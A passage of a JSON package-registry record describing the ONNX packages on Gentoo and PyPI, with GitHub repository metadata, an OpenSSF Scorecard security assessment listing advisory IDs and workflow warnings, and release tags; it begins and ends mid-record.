cmake","iuse":"disableStaticReg python_targets_python3_11 python_targets_python3_12 python_targets_python3_13 python_targets_python3_14 debug"},"repo_metadata":{},"repo_metadata_updated_at":"2026-05-27T04:28:51.227Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:gentoo/sci-ml/onnx","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/gentoo/sci-ml/onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/gentoo/sci-ml/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/gentoo/sci-ml/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/sci-ml%2Fonnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/sci-ml%2Fonnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/sci-ml%2Fonnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/sci-ml%2Fonnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/sci-ml%2Fonnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages/sci-ml%2Fonnx/codemeta","maintainers":[],"registry":{"name":"gentoo-portage","url":"https://packages.gentoo.org/","ecosystem":"gentoo","default":true,"packages_count":19340,"maintainers_count":0,"namespaces_count":174,"keywords_count":484,"github":"gentoo","metadata":{"snapshot_url":"https://distfiles.gentoo.org/snapshots/portage-latest.tar.xz","funded_packages_count":87},"icon_url":"https://github.com/gentoo.png","created_at":"2026-05-26T08:59:24.155Z","updated_at":"2026-06-21T05:00:17.797Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/gentoo-portage/namespaces"}},{"id":10695669,"name":"amd-onnx","ecosystem":"pypi","description":"Open Neural Network Exchange","homepage":"https://onnx.ai/","licenses":"Apache License v2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":3,"first_release_published_at":"2024-07-16T00:48:07.000Z","latest_release_published_at":"2024-07-16T01:03:45.000Z","latest_release_number":"1.17.0","last_synced_at":"2026-06-13T13:03:12.852Z","created_at":"2024-07-16T01:00:58.086Z","updated_at":"2026-06-13T13:03:12.852Z","registry_url":"https://pypi.org/project/amd-onnx/","install_command":"pip install amd-onnx --index-url https://pypi.org/simple","documentation_url":"https://amd-onnx.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Programming Language :: Python :: 3"],"normalized_name":"amd-onnx","project_status":null},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2026-05-08T15:36:18.000Z","size":69678,"stargazers_count":20785,"open_issues_count":282,"forks_count":3928,"subscribers_count":425,"default_branch":"main","last_synced_at":"2026-05-08T17:35:37.464Z","etag":null,"topics":["ai","artificial-intelligence","deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2026-05-08T15:36:24.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":38,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32957020,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-12T09:19:52.626Z","status":"ssl_error","status_checked_at":"2026-05-12T09:17:33.438Z","response_time":102,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.21.0","sha":"be2b5fde82d9c8874f3d19328bdfe3b6962dc67b","kind":"commit","published_at":"2026-03-27T17:18:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.21.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.21.0/manifests"},{"name":"v1.20.1","sha":"d3f6b795aedb48eaecc881bf5e8f5dd6efbe25b3","kind":"commit","published_at":"2026-01-09T23:10:46.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.20.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"bca0315ff3e56bb5847509ca32fadb8d87f680e1","kind":"commit","published_at":"2025-12-01T17:08:15.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.20.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.0/manifests"},{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.